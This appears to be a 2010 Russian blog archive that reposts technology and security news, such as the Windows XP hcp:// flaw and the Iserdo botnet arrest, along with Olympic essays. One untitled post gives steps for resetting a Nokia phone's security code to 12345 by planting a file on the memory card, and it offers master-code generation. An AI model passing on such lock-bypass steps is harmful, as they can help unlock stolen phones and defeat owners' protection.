Компания Seagate выпустила внешний диск объемом три терабайта, сообщается в официальном пресс-релизе. Рекомендованная розничная стоимость жесткого диска FreeAgent GoFlex Desk составит 250 долларов. По заявлению производителя этот жесткий диск станет первым в мире устройством для хранения с таким объемом, "созданным для размещения на рабочем столе". Размеры GoFlex составляют 15,8 на 12,4 сантиметра при толщине 4,4 сантиметра. Весит жесткий диск немногим более килограмма. Эта модель стала старшей в линейке FreeAgent GoFlex, которая также включает устройства объемом 1 и 2 терабайта. При этом ее объема достаточно для хранения 120 фильмов стандарта высокой четкости или сотен тысяч фотографий. Он оснащается портом USB 2.0 и в комплекте с устройством будет поставляться соответствующий адаптер. Вместе с тем дополнительно Seagate предлагает адаптеры стандарта FireWire 800 или USB 3.0, которые обеспечивают большую скорость чтения и записи, по сравнению с USB 2.0. О разработке трехтерабайтного жесткого диска стало известно в середине мая. Сообщалось, что жесткие диски смогут работать с компьютерами как на базе ОС Windows, так и с установленной Mac OS.


Состоялся релиз веб-браузера Opera 10.60

Четверг, 19 Августа 2010 г. 12:29 + в цитатник


Компания Opera Software сегодня выпустила финальную версию браузера Opera 10.60 для платформ Windows, Mac и Linux. Эта версия включает новые возможности, характеризуется повышенной безопасностью и улучшенной стабильностью, а также работает на 50% быстрее предыдущей версии браузера - Opera 10.50, говорят в компании. В новом браузере доступны технологии, формирующие будущее Веба. Одной из таких является поддержка API для геолокации (Geolocation API), которая позволяет определять местоположение пользователя. При этом, данная функция предполагает жёсткий контроль и регулирование для обеспечения приватности. Для того чтобы продемонстрировать работу API для геолокации Opera разработала интерактивную карту, показывающую в реальном времени количество загрузок браузера Opera пользователями во всех регионах мира: http://www.opera.com/livemap/ Opera 10.60 включает открытый видеокодек WebM, позволяющий просматривать оптимизированное видео прямо в браузере и на всех платформах. Среди других функций стоит отметить: технологию Opera Unite для обмена контентом без использования веб-сервисов; технологию синхронизации персональных настроек браузера между различными устройствами с Opera на борту (например, между компьютером и мобильным телефоном) Opera Link; предустановленные поисковые панели для быстрого доступа к поисковым сервисам; навигацию жестами компьютерной мыши. Opera 10.60 на 50% быстрее предыдущей версии браузера и лидирует в ряде тестов, таких как Peacekeeper и Sunspider. Для пользователя это означает ещё более быструю загрузку современных сайтов и сервисов, созданных с использованием JavaScript, например Gmail and Facebook. Opera 10.60 включает систему защиты от сетевых мошенничеств, фишинга и вредоносного ПО на основе разработок компании AVG. Система в постоянно обновляет сведения о новых угрозах в Сети и предупреждает пользователя о недобросовестных сайтах и сервисах. Информация о сайтах с вредоносным кодом предоставляется компанией «Яндекс».
Есть в браузере и другие перспективные разработки:
- AppCache: позволяет работать с различными приложениями, такими как текстовый, табличный или графический редактор, прямо в окне браузере и без подключения к Интернету, сохраняя все данные на компьютере для последующей синхронизации с веб-сервисами.
- Opera 10.60 включает несколько поисковых сервисов на выбор пользователя. Теперь в их ассортимент добавлена система Bing, однако Google остаётся поиском по умолчанию в браузере Opera. (В версиях Opera 10.60 для России, Украины и Беларуси Bing не предлагается).
- Для некоторых поисковых систем и сервисов, таких как «Яндекс» и Wikipedia, в поисковом окне браузера предлагаются подсказки для более быстрого формирования запроса.

Больше всего кибератак исходит со стороны Китая и России

Четверг, 19 Августа 2010 г. 12:28 + в цитатник
Группа экспертов НАТО по заказу правительства провела исследование компьютерных систем США и выявила, что они недостаточно хорошо защищены от возможных угроз из киберпространства. «Следующая потенциальная атака на страны блока НАТО может последовать через оптоволоконные кабели», – резонно заметила Мадлен Олбрайт, которая сейчас является ведущим экспертом Североатлантического альянса.

Эксперты отмечают постоянно увеличивающееся количество атак на США и их партнеров по НАТО. Больше всего атак, говорят они, исходит со стороны Китая и России.

Кибертерроризм, подчеркивает госпожа Олбрайт, сравним по своим угрозам с традиционным терроризмом. Поэтому, заявила она, в случае обнаружения массированной кибератаки на США вообще и серверы НАТО в частности военный альянс будет готов принять жесткие ответные меры. «НАТО вполне допускает применение ответных мер в случае нападения на инфраструктуру стран, которые этот альянс защищает. В том числе мы готовы и к применению вооруженных сил против агрессоров», – заявила Мадлен Олбрайт.

Надо сказать, угроза кибервойны сегодня это уже не термин для писателей-фантастов, а реальная угроза стабильности в некоторых государствах. В 2007 году компьютеры государственных структур Эстонии подверглись массированной атаке вирусными программами. В результате множество компьютеров прекратило на время свою работу, а вся страна испытывала проблемы с коммуникациями. Компьютерные эксперты НАТО утверждают, что эта атака была произведена жителями России. В августе 2008 года нападениям подверглись правительственные компьютерные сети Грузии. Хакеры тогда смогли нарушить множество производственных процессов в правительственных компьютерах – например, была нарушена связь между американским госдепартаментом и МИД Грузии. Российский «след» в этой истории также нашли многочисленные эксперты.

Но это все «цветочки» по сравнению с тем, на что реально способны хакеры. Весной этого года американская некоммерческая организация Bipartisan Policy Center провела эксперимент, в ходе которого попыталась выяснить, насколько уязвима экономика США для хакеров. Результаты несколько шокировали общественность. Для «атаки» на сети государственных учреждений использовалось всего лишь 230 ПК участников эксперимента. Этого оказалось достаточно для того, чтобы парализовать работу компьютеров, отвечающих за электроснабжение страны, в считанные минуты. Затем ученые провели похожую атаку на сотовые сети: мобильные устройства абонентов заражались вирусами, после чего смартфоны начинали особенно интенсивно потреблять дата-трафик. В итоге это приводило к массовым сбоям базовых станций. Эксперты утверждают: если хакеры поставят себе целью поразить США и будут делать это с максимальной эффективностью, 40 млн американцев на востоке страны останутся без света уже спустя 30 мин после начала «наступления». Пройдет чуть больше часа – и 60 млн абонентов мобильной связи в стране увидят, что их телефоны превратились в неработающие «брелки». Для того чтобы парализовать работу Wall Street, понадобится буквально пара часов.

О том, что «кибервойна» – не пустой звук, свидетельствует и история с уходом Google с китайского рынка. Серверы компании атаковали хакеры, воровавшие конфиденциальную информацию пользователей, а потому интернет-гигант ушел со второго по значимости интернет-рынка мира. По данным ФБР, в США проживают и «промышляют» около 180 тыс. хакеров и кибершпионов.

Опасность для США действительно огромна: экономика этой страны зависит от интернета в наибольшей степени. По данным официального государственного агентства US-Cert, отвечающего за безопасность компьютеров в интернете, еще в 2006 году на страну было совершено 2172 кибератаки, в 2008 году – уже 5488, а в 2009?м – без малого 10 тыс. Цифры только продолжают расти. Ситуация усугубляется тем, что, по словам экспертов, защитить страну от киберугроз значительно сложнее и дороже, нежели напасть на нее: здесь традиционные понятия о войне не работают. Вероятно, поэтому Пентагон и угрожает возможным «настоящим» вооруженным конфликтом.


Microsoft зафиксировала новую волну атак на Windows XP

Четверг, 19 Августа 2010 г. 12:28 + в цитатник


Спустя почти месяц после того, как инженеры Google опубликовали детали о новой уязвимости в ОС Windows XP, кибер-преступники начали активно эксплуатировать этот баг. В Microsoft заявили в минувшую среду, что зарегистрировали более 10 000 атак, эксплуатирующих указанный баг. "Вначале мы видели, как исследовательские компании с концептуальной точки зрения изучают опасность. Однако 15 июня было зафиксировано появление первого публичного эксплоита", - говорится в сообщении Microsoft. "Вначале распространение эксплоита было довольно ограниченным, но с прошлой недели количество атак резко возросло". Согласно данным Microsoft, атаки запускаются с вредоносных сайтов, расположенных на территории США, России, Германии, Португалии и Бразилии. "Особенно высока концентрация инфицированных сайтов в Португалии и России", - говорят в Microsoft. Одновременно с отчетом Microsoft, данные, подтверждающие резкий рост числа атак, опубликовала и компания Symantec. По данным этой компании, резкий рост атак был отмечен 21 и 26 июня. В Symantec говорят, что злоумышленники используют данный эксплоит для распространения различных вирусов и троянов, а также программного обеспечения Obitel, загружающего на ПК пользователя массу других вредоносных кодов. Согласно обнародованным данным, уязвимость затрагивает функцию Windows Help and Support Center в операционных системах Windows XP и Windows Server 2003. Прочие версии Windows данному багу не подвержены. В сообщении Microsoft Security Research and Defence говорится, что запуск Help and Support Center через ссылку hcp:// в большинстве случаев не представляет опасности и может рассматриваться как один из вариантов для запуска системы помощи, однако инженер по безопасности Google обнаружил наличие кросс-скриптинговой уязвимости и механизма, сопровождающего ее, позволяющего использовать эту функциональность для создания запроса к файлам, хранящимся на ПК. Так, находясь на сайте, где будет размещена ссылка вида hcp:// со специальным эксплоитом, хакер может посредством файла helpctr.exe запустить один из файлов на компьютере. Кроме того, отмечается, что данная атака - это лишь часть системы взлома и прежде чем запустить вредоносный файл через интерпретатор helpctr.exe, этот файл нужно разместить на компьютере. Независимые эксперты по безопасности говорят, что в целом протокол hcp можно рассматривать как довольно надежный и уязвимости здесь обнаруживаются реже, чем в других продуктах корпорации. В корпорации говорят, что пока работают над исправлением данной уязвимости и в качестве временной меры предлагают заблокировать работу hcp через реестр системы.

Бот-автоответчик обманывает ботов-спамеров

Четверг, 19 Августа 2010 г. 12:27 + в цитатник











Телекоммуникационная компания Andrews & Arnold Internet service (AAISP) из британского города Брекнелл изобрела оригинальный способ борьбы с телефонными дистрибьюторами, действующий в полностью автоматическом режиме. В настоящий момент технология обкатывается на виртуальной АТС самого телекома, но в самом ближайшем будущем компания планирует предоставлять её в качестве опциональной услуги для своих клиентов.

Идея родилась спонтанно вечером минувшего четверга, после того как за семь часов рабочего дня было зафиксировано более 330 звонков от телефонных спамеров на номера АТС компании, о чём глава AAISP написал в своём блоге. Не прошло и двадцати минут, как в комментарии к этой записи он сообщил, что включил более 800 свободных номеров пула в новый режим, получивший рабочее название "nasty" (неприятный, недоброжелательный).

Технология базируется на том, что телефонные спамеры широко используют роботов-дозвонщиков, которые тупо перебирают все возможные номера и рекламируют некие услуги при помощи записанного сообщения. Традиционно потенциальному клиенту предлагается нажать на телефоне кнопку с цифрой 2, чтобы связаться с живым человеком, который уже принимается "окучивать" жертву по полной программе.

Режим "nasty" включается только для неиспользуемых номеров виртуальной АТС, а также лишь в случаях, когда входящий номер не распознаётся (как это обычно бывает в случае со спамом). При этом звонящему (который с большой долей вероятности является роботом) проигрывается запись автоответчика, сообщающая, что данный номер не принимает звонки от анонимов, после чего автоматически проигрывается тональный сигнал "двойки".

Если на том конце поднимается трубка — значит, спамер попался на удочку. В этом случае — опять же, автоматически — включается записанное заранее сообщение, в котором в довольно непринуждённой манере собеседнику (т.е. телефонному спамеру) объясняется, что данный разговор записывается, что с ним говорит автоответчик, что он, спамер, нарушает закон, что сюда ему лучше не звонить, что данное сообщение будет воспроизводиться циклически до тех пор, пока собеседник не повесит трубку — и т.п. Причём за этот разговор с собеседника уже взимается плата.

Судя по выложенным в общий доступ записям, некоторых спамеров удавалось удержать на линии больше двух-трёх минут. Многие из них даже толком не слушали, что им говорят, а просто гнули свою линию.

В AAISP обкатывали новый режим в течение выходных, а уже сегодня с удивлением обнаружили, что звонки от спамеров на их АТС прекратились. Предположительно, весь пул номеров этой сети — то есть как номера-пустышки, так и действующие номера — был занесён спамерами в "чёрный список".

Сейчас в AAISP гадают, что произойдёт, когда эта услуга будет доступна (без дополнительных денежных начислений) для 4 миллионов номеров, которые телеком предоставляет для клиентских АТС. В компании также уверены, что действуют строго в рамках законодательства.

Некоторое количество сделанных записей разговоров со спамерами руководитель AAISP отослал в офис британского Уполномоченного по информации, однако он сомневается, что это приведёт к чему-то путному. А вот на эффективность нового антиспамерского режима здесь очень рассчитывают. Также телеком рассматривает идею о том, чтобы автоматически соединять спамеров друг с другом в одну "большую конференцию по телефону", да ещё и транслировать её в режиме реального времени в Интернете.



МВД: Наиболее активные пользователи торрент-трекеров могут быть привлечены к ответственности

Четверг, 19 Августа 2010 г. 12:26 + в цитатник











Следственным комитетом при МВД России проводится предварительное расследование уголовного дела по обвинению Ивана и Ирины Подорожниковым (данные до судебного решения изменены) в совершении преступлений, предусмотренных ч. 3 ст. 146 (Нарушение авторских и смежных прав) Уголовного кодекса Российской Федерации.

В ходе расследования установлено, что супруги Подорожниковы совместно с гражданином иностранного государства, действуя в сети Интернет под псевдонимами, зарегистрировали на подставное лицо электронный ресурс «interfilm.ru» и расположили его на сервере иностранной хостинговой компании (Королевства Нидерландов). Затем Подорожниковы без согласия правообладателей разместили в Интернете десятки аудиовизуальных произведений.

Как отмечается в сообщении пресс-службы Следственного комитета при МВД РФ, в 2007-2008 годах электронный ресурс «interfilm.ru» был одним из самых востребованных киносайтов у пользователей Интернета. Подобную популярность обвиняемые заслужили, размещая на своем ресурсе киноленты, в том числе не вышедшие в прокат в России: «Фантастическая четверка», «Шрек третий», «Обитель зла 3», «Внутренняя империя» и другие.

Закупались эти контрафактные копии у «пиратов» - жителей иностранных государств, на территории которых кинохиты выходили в прокат на несколько месяцев раньше, чем в России. Супруги делали любительский перевод и «запускали кино в массы». Любой пользователь получил возможность скопировать эти произведения для последующего просмотра, перечислив на счета небольшую денежную сумму, открытые обвиняемыми в платежной системе WebMoney Transfer и ООО «ПС Яндекс.Деньги».

По данным следствия, только за полтора года такой незаконной деятельности обвиняемые нарушили авторские права десятка российских и зарубежных кинокомпаний, оценивших стоимость исключительного права на использование кинолент на общую сумму более 38,7 млрд рублей.

Как сообщается, в ходе предварительного расследования следователи Следственного комитета при МВД России столкнулись с активным противодействием со стороны обвиняемых. Так, они не только изменили место жительства, применили новую систему оплаты своих незаконных услуг, но и продолжали противоправную деятельность, управляя аналогичными электронными ресурсами после блокирования правоохранительными органами ресурса «interfilm.ru».

Сотрудниками Следственного комитета при МВД России и УСТМ ГУВД по Московской области было проведено более 20 обысков у наиболее активных Интернет-пользователей вышеуказанного киносайта. Полученные доказательства позволяют утверждать, что обвиняемые причастны к созданию и администрированию других торрент-трекеров, позволяющих всемирной Интернет-аудитории иметь неограниченный доступ к объектам авторских прав. В настоящее время решается вопрос о привлечении к ответственности наиболее активных пользователей вышеуказанного Интернет-ресурса, сохранивших в персональном компьютере значительное количество контрафактных копий кинофильмов, отмечается в сообщении пресс-службы МВД.

В сообщении также отмечается, что до настоящего времени в России практически отсутствовал опыт расследования уголовных дел данной категории. Возбужденное же в мае 2009 года на основании заявления Некоммерческого партнерства «Российская антипиратская организация по защите прав на аудиовизуальные произведения» уголовное дело позволило разработать методику расследования подобных преступлений.

Следственный комитет при МВД России сообщает, что сохранение на персональном компьютере хотя бы одной копии такой контрафактной продукции является нарушением действующего российского законодательства.



Ученые научились подслушивать принтеры

Четверг, 19 Августа 2010 г. 12:25 + в цитатник
Группа немецких ученых из Заарландского университета разработала технологию, позволяющую распознавать тексты, которые печатают матричные принтеры, анализируя издаваемые ими звуки.

В своем исследовании ученые использовали 24-игольчатый принтер Epson LQ-300 II, но уверяют, что на его месте мог быть любой другой матричный принтер. Правда, под каждую конкретную линейку устройств придётся настраивать программное обеспечение по распознаванию.

Принтеру давались команды печатать ряд английских текстов — как общего характера (из "Википедии"), так и специфического (медицинского). Дело в том, что в Германии, как говорит приведенная исследователями статистика, матричными принтерами пользуется около 60% врачей.

Стук иголок по бумаге записывался при помощи микрофона фирмы Sennheiser, затем пропускался через программы распознавания и коррекции. Распознавание происходит на уровне целых слов, которым софт должен быть заранее обучен (ориентация на отдельные символы оказалась слишком сложной, поскольку "соседние" звуки накладываются друг на друга).

Это позволяет проводить два типа экспериментов: один касается случаев, когда тематика печатаемого текста известна заранее (например, хакер "прослушивает" рецепты, которые печатает доктор), а второй — соответственно, когда неизвестна. В первом случае работа проводится по специфическому словарю (вероятность того, что в тексте используются, к примеру, медицинские термины или словосочетания, характерные для медицинских текстов, выше), во втором — по общему.

Согласно представленным результатам, в случае когда тематика документа известна заранее, точность распознавания текста "на слух" может достигать 95%. Во втором случае точность может доходить до 70%.

Кроме того, ученые утверждают, что данную технологию можно распространить и на струйные принтеры. Они тоже издают определенные звуки — за счет пузырьков чернил и, в некоторых случаях, пьезоэлектрических элементов. Их тоже можно было бы распознавать. Однако, проблема заключается в том, что эти звуки слишком тихие и их заглушает шум, который производят механические части печатающего устройства. Поэтому уловить их с помощью микрофона не удалось.

А лазерные принтеры, как говорят исследователи, вовсе неуязвимы к такого рода атакам.


Panda Security помогла арестовать хакера Iserdo

Четверг, 19 Августа 2010 г. 12:25 + в цитатник

Компании Panda Security и Defence Intelligence помогли поймать киберпреступника. Эти компании предоставили ФБР и другим международным органам важную информацию, благодаря которой удалось поймать 23-летнего хакера Iserdo. Доказано, что именно он является создателем набора «Бабочка» (Butterfly), на котором основаны многие бот-сети.

Обычно бот-сети используют определенные наборы вредоносных программ. Компании Panda Security и Defence Intelligence, а также их партнеры из Рабочей группы Mariposa в течение двух лет анализировали набор программного обеспечения «Бабочка» (на ее основе была создана бот-сеть Mariposa). Благодаря полученным данным правоохранительные органы смогли вычислить хакера Iserdo. Он был арестован в Мариборе (Словения), однако в настоящее время выпущен под залог.

Набор «Бабочка» свободно продавался в Интернете, его стоимость составляла от 500 € до 1500 € (650 $ - 2000 $ США). Набор был очень прост в использовании: любой человек, даже не обладающий специальными навыками работы с компьютером, мог совершать массовые кибер-преступления. На основе «Бабочки» было создано почти 10 000 уникальных вредоносных программ и более 700 бот-сетей. Их жертвами стали сотни финансовых институтов и государственных учреждений, а также миллионы частных организаций и физических лиц по всему миру.

«За последние два года набор «Бабочка» был продан еще сотням других преступников. Он стал одним из самых известных в мире», - рассказал Директор ФБР Роберт С. Мюллер.

«Арест Iserdo – это первый случай преследования автора набора вредоносных программ, обычно ловят операторов бот-сетей, - отметил Кристофер Дэвис, Исполнительный директор Defence Intelligence. – Мы должны пойти дальше – найти людей, которые пишут вредоносные коды, продают и распространяют их. А также каналы, которые они используют для обналичивания украденных карт и банковских данных».

Трой Джеффри, Заместитель помощника директора кибер-подразделения ФБР, согласен с Дэвисом: «Мы не просто задержали вора, который ворвался в Ваш дом. Мы арестовали того, кто предоставил вору лом, карту и обозначил лучшие дома в округе. И это огромный прорыв в расследовании кибер-преступлений».

Хуан Сантана, Исполнительный директор Panda Security, отметил: «Мы очень гордимся тем, что мы смогли помочь вычислить и арестовать Iserdo. Но мы понимаем, что это лишь один из многих кибер-мошенников и что впереди еще очень много работы. Мы уверены, что для эффективной борьбы с кибер-преступностью необходимо объединить усилия организаций компьютерной безопасности и государственных органов. Мы должны вместе добиваться принятия законов, которые позволят применять санкции в отношении преступников. Также необходимо обеспечить хорошую подготовку рабочих групп (таких как Рабочая группа Mariposa) для разработки адекватных предупреждающих и восстановительных мер по борьбе с кибер-преступниками».

За последние несколько месяцев Рабочая группа Mariposa внесла свой вклад в арест пяти кибер-преступников и помогла ликвидировать одну из крупнейших бот-сетей в мире – Mariposa. Тем временем, компания Defence Intelligence создала специальную сеть «sinkhole», куда перенаправляются сотни бот-сетей. Это помогает предотвратить их распространение и облегчает анализ. «Благодаря этому десятки миллионов пользователей, уникальных IP-адресов попадают к нам, а не к «плохим парням», - говорит Мэтт Томпсон, Ведущий научный сотрудник Defence Intelligence.

Правоохранительные органы в настоящий момент изучают пользователей набора «Бабочка», и в ближайшее время ожидается новая серия арестов.



Знакомьтесь: Дэйв / Meet Dave (2008) Онлайн

Четверг, 19 Августа 2010 г. 12:21 + в цитатник

В поисках способа спасения своего мира, находящегося на грани катастрофы, команда миниатюрных человекоподобных пришельцев прибывает на Землю на корабле, замаскированном под тело обычного человека. В нашем мире им приходится приспосабливаться, чтобы не быть схваченными людьми.

 

Рубрики:  Видео
Новинки кино

Метки:  

Без заголовка

Среда, 18 Августа 2010 г. 20:41 + в цитатник

Мастеркод, сгенерированный, скриптом может работать только на следующих моделях:

2100, 2650, 3100, 3120, 3200, 3210, 3220, 3230, 3300, 3310, 3315, 3330, 3350, 3360, 3390, 3395, 3410, 3510, 3510i, 3520, 3650, 3660, 5100, 5110, 5130, 5140, 5146, 5190, 5210, 5510, 6020, 6021, 6030, 6090, 6100, 6101, 6102, 6108, 6110, 6130, 6170, 6200, 6210, 6220, 6225, 6230,6230i, 6250, 6260, 6310, 6340, 6360, 6370, 6500, 6510, 6590, 6600, 6610, 6610i, 6620, 6650, 6660, 6670, 6800, 6810, 6820, 7110, 7160, 7190, 7200, 7210, 7210i, 7250, 7250i, 7260, 7270, 7280, 7600, 7610, 7650, 7700, 7710, 8210, 8250, 8270, 8280, 8290, 8310, 8390, 8510, 8800, 8810, 8850, 8855, 8890, 8910, 9000, 9110, 9210, 9290, 9300, 9300i, 9500, N-gage and N-gage QD

*** Если вашей модели нет, но у Вас есть дата-кабель и желание. Качаем архив (ссылка) и снимаем код сами в домашних условиях.

***

*** Разблокировать ЗАЩИТНЫЙ КОД телефона можно и без кабеля.Для разблокировки вытащить SIM, выключить телефон. На карту памяти в каталог E:\system\recogs закинуть файл (ссылка) и включить телефон.
Подождать 3 минуты, ничего не делать с телефоном.
Выключить телефон, вытащить карту и батарею.
После этого код станет "12345"!

Это работает на смарфонах Nokia OS Simbian 7(WD2) и 8(старые смартфоны Nokia BB5 типа N70).

Рубрики:  Хакерские программы
Интересно знать

Аватар

Среда, 18 Августа 2010 г. 02:14 + в цитатник
За время Олимпиады мы сотни раз в своих репортажах поминали слово «Ванкувер». Но так, кажется, и не удосужились толком рассказать, что оно значит.


ДОЖДЬ – ЭТО СЛЕЗЫ ВАНКУВЕРА
Я был здесь год назад. Даже чуть меньше, чем год, – в марте 2009-го. Это было чудесное время. В Уистлере, где проходил во всех смыслах пристрелочный этап Кубка мира по биатлону, царила зимняя сказка. Не тепло, но и не холодно — минус 10. Без осадков, но обилие снега под ногами. Представить, что через год здесь будет лить проливной дождь, превращающий снежный покров в непригодное для спорта месиво, было решительно невозможно.


Однако это случилось. И я не удивился. Это были слезы Ванкувера. Его адские страдания. Аномальной для этого времени года погодой он молил: уйдите вы отсюда со своей Олимпиадой, не мешайте нам жить в гармонии с природой и людьми, ее населяющими!


Я не знаю человека, который придумал, что Олимпийские игры должны пройти именно в Ванкувере. Но я почему-то на все сто уверен, что он — не ванкуверец. Эти, местные, ребята с первого дня смотрели на нас с настороженной брезгливостью. Понаехали тут!


Ванкуверцы были явно заодно с городом, изрыгающим антиолимпийские природные катаклизмы. Здешние жители живут в такой гармонии с природой, что свалившаяся к ним на голову мультинациональная олимпийская бригада — словно земляне из кэмероновского «Аватара», шляющиеся по территории племени На’ви в поисках дорогостоящего анобтаниума.


ЛЮДИ ТРАВЫ
Ванкувер — сравнительно молодой город. Ему нет и двухсот. Поэтому он не напрягает визитеров древними достопримечательностями. Максимум — первые в мире паровые часы в Гастауне, старом городе, являющиеся чуть ли не главной музейной реликвией города. В результате Ванкувер, как поздний ребенок, позволил себе отказаться от каких-либо традиций, а просто расти для жизни и любви. И вырос ровно настолько, чтобы соблюдать нормы комфорта: в самом Ванкувере, не считая пригородов, – всего 600 тысяч человек живет. Да что там живет – кайфует!


Трижды – в 2005-м, 2007-м и 2009-м – авторитетные эксперты присваивали Ванкуверу звание, ни много ни мало, лучшего города Земли. Здешние скромно соглашаются с этим выбором и лепят, где только можно, клеймо «Британская Колумбия – лучшее место для жизни». Чаще всего этот «знак качества» видишь в туалете на листовках, объясняющих, почему вода и мыло льются тебе в руки по воле фотоэлементов. Ванкуверцы экономят дары природы во всем. Скажем, туалетная вода в свежепостроенном конькобежном центре, ставшем счастливым для нашего Ивана Скобрева, – это не что иное как дождь, неосмотрительно упавший на крышу заведения.


Крыша, кстати, тоже у него символичная. На нее пошла древесина, полученная из лесов, пораженных жуком-короедом. То есть деревья мучительно умирали, но люди продлили им жизнь! Вполне достойное героев «Аватара» единение ванкуверцев с природой – не с них ли списанное? Стоит ли говорить о том, что прочая часть «Ричмондского овала» сделана по экологически чистым технологиям, а название древнего племени масквим, обитавшего в этом месте до визита Джеймса Кука, в переводе означает «люди травы».


ПОЕЗД – ДЛИННЫЙ СМЕШНОЙ ЧУДАК
Ванкуверцы отдают себе отчет в том, что человек – враг не только природе, но и себе подобным. С этой мыслью они упорно пытаются загладить вину перед окружающей средой и оградить население от излишних контактов с себе подобными. Яркий пример – скай-трейн.


По сути, это метро, которое, однако, очень редко ныряет под землю, а все норовит проскочить по уличным эстакадам. Вход платный, и билеты продают только автоматы. Но фишка в том, что их никто не проверяет. Ванкуверцам достаточно надписи на плиточном полу: зона проверки оплаты проезда. Завидев ее, они послушно бредут к автомату, чтобы потратить кровные. Нет, ну точно они для нас люди с другой планеты!


Но главное, товарищи, даже не в деньгах. Главное в том, что скай-трейн – автоматический поезд. В нем нет машиниста. Дабы убедиться в этом, достаточно сесть на то место, где в обычных электричках этот машинист находится. Это место совершенно доступно для любого пассажира: садись и «рули».


Поезд-автомат таит в себе массу чудес. Он не опаздывает. Он не давит людей ни колесами, ни дверями. Он не орет о том, что надо побыстрее выходить-выгружаться, или о том, что «прекратите удерживать двери вагона». С ним даже нестрашно проехать конечную станцию, ибо он тут же возвращается обратно.


«КАК ДЕЛА, РАШЕН?»
Сократив до минимума человеческое общение, где это только возможно, ванкуверцы по-настоящему научились получать удовольствие от общения внештатного. Если ты не вырядился в вызывающие цвета своей олимпийской сборной, если не козыряешь болтающейся на пузе аккредитацией, то вполне можешь рассчитывать на доброе «как дела?» с последующим распитием водки в ближайшем баре («а чем тебя еще угощать, парень, коль ты из России?») и ночными проводами до ближайшей станции скай-трейна. Уж он-то, автоматический наш друг, довезет, ему можно доверить нового приятеля, будьте покойны.


И даже когда по неведомым мне причинам поезд останавливается посреди двух станций на 10 минут, и когда вагон все это время раскачивают неблагонадежные юноши из пригорода с криками «fuck USA» (а что им еще кричать в ночь перед хоккейным финалом?), и когда стекла вагона потеют до абсолютной непрозрачности от алкогольных выхлопов... Даже в этот момент я, запаниковавший бы в подобной ситуации в любом другом городе мира, абсолютно спокоен. Потому что этому городу чужды катастрофы. Если только его не насилуют Олимпиадой. И кому все-таки пришла эта безумная идея провести ее именно здесь?





Любить по-русски, но негромко

Среда, 18 Августа 2010 г. 02:13 + в цитатник
Наш северо-восточный сосед в полном смятении. В активе делегации РФ на зимних Играх-2010 более чем скромные три «золотинки» и… 11-е место. Разбираются в Москве вовсе не на уровне министра спорта Виталия Мутко, но в Кремле. Нам же важны уроки, которые стоило бы извлечь из просчетов мировой державы с людским потенциалом, сопоставимым с «остальной Европой в сумме». Да, у нас масштабы поменьше, а с тренировочными базами — тупик, но раз уж вышли из единой шинели, то выявлять аномалии системы управления спортом предстоит тем же рентгеном.


На мой осторожный взгляд, россияне переоценили количество (вложенных денег, взращенных звезд, связей в международных федерациях) и проспали качественный всплеск в лагере соперников. А те, приняв прогрессивные законы о поддержке «товарища инвестора» и государственной подпитке спортивной науки, резко убежали вперед. Логично вспомнить самую последнюю до падения Берлинской стены Белую Олимпиаду-1988 в другом канадском городе — Калгари. Лидерство СССР (11 золотых медалей, по 9 серебряных и бронзовых) и ГДР (9—10—6) было неоспоримым. Сегодня же единая Германия, по-марксистки четко расставив акценты, легко обыграла в Ванкувере всех собратьев по Союзу.


А еще, похоже, в Москве не сразу поняли, что, казалось бы, железные их призовые места растащили вовсе не только привычные оппоненты (тогда, 22 года назад, ближе всех к коммунистическому тандему стояли швейцарские нейтралы, финские и шведские социалисты), но участники поскромнее. В том числе герои бракоразводных историй — Чехия, Словакия, Словения, Хорватия, Эстония и т. д. Хотя, пожалуй, главный российский олимпиец Леонид Тягачев, по совместительству партнер Владимира Путина в сеансах горнолыжного слалома, все же предчувствовал потерю темпа. Иначе как объяснить натуральную истерию вокруг мужской хоккейной сборной, якобы обязанной добыть самое ценное «золото» из всего намеченного улова? Будто в лыжах-санях побеждать не так приятно.


Пресса и телевидение давили на любовь народа к ледовым рыцарям и сверхпатриотизм самих игроков-миллионеров, запросто нанимавших частные авиалайнеры, чтобы на сутки раньше прибыть в расположение дружины Вячеслава Быкова, максимально обласканного Дмитрием Медведевым после триумфа на ЧМ-2009 в Швейцарии. Уже по ходу олимпийских будней силовой прием супермена Саши Овечкина против чешского кумира Яромира Ягра смаковался, словно подвиг папанинцев. В итоге, у бесспорно одаренных русских профи и у миллионов их болельщиков наступил, пардон, преждевременный оргазм. Нарвавшись на хозяев Игр задолго до финала, они растерялись после первых же рабочих промахов Евгения Малкина и могиканина Сергея Федорова в атаке и бросили голкипера Евгения Набокова на съедение хищникам Майка Бэбкока, стряхнувшим с себя не меньший прессинг от всего населения Канады. Победный овертайм финала с командой США (3:2) ознаменовал 14-ю высшую награду хозяев на Играх, что будет отныне рекордом, превосходящим число «13» у СССР (1976) и Норвегии (2002), хотя, конечно, советский процент объективно выше — тогда дисциплин на кону было 37, теперь — 86.


Поверьте, журналист далек от смакования чьих-то неудач. Тем паче нам своих хватает. И не спишешь медальную засуху на совпадение подготовки к Олимпиаде-2010 с разгаром президентской гонки, обошедшейся налогоплательщику подороже смет на полсотни «зимних» атлетов. Я о том, что как бы громко ни вещали с Шаболовки и Останкино, а каждый матч-заезд-запрыг начинается со счета 0:0 и НИКТО НИКОМУ НЕ ДОЛЖЕН. Себе — да, но этот отсчет следует вести от других предгорий. Когда должности в спортивных ведомствах раздаются не по принципу партийно-политических пропорций, а ради того, чтобы тренер шел на занятия, а родители — приводили туда детей, не комплексуя из-за цен в гастрономах их Пресни и нашей Оболони. Видать, они и мы до такого пока не созрели. Посему не стоит удивляться ванкуверскому перевесу США над Россией, а Беларуси над Украиной — полезнее признать ошибки и сделать вывод…






ШУМБАРЕЦ: «Ничего не помню и вспоминать не хочу»

Среда, 18 Августа 2010 г. 02:12 + в цитатник
После оперативного сообщения пресс-службы Национального олимпийского комитета Украины о том, что жизни Виталия Шумбарца ничего не угрожает, и он проходит курс лечения в одной из больниц Ванкувера, больше информации не поступало. А в пятницу во время произвольной программы фигуристок-одиночниц я увидела Виталия на трибунах Pacific Colliseum. Немного осунувшийся, с рукой в бандаже и с сильно ободранным подбородком, он согласился ответить на вопросы корреспондента «СЭ».

- Чувствую себя намного лучше, - голос спортсмена звучал бодро и весело. - Каждый день хожу на курсы реабилитации. Относятся ко мне хорошо. Врачи удивляются, как быстро становлюсь на ноги. После госпитализации говорили, что на восстановление уйдет от пяти до семи дней, а выписали уже на третий.
Сейчас живу в Олимпийской деревне. По окончании Игр обещала приютить диаспора. Девятого марта у меня последний медосмотр, после которого или сразу дадут разрешение на перелет или велят еще неделю подождать.

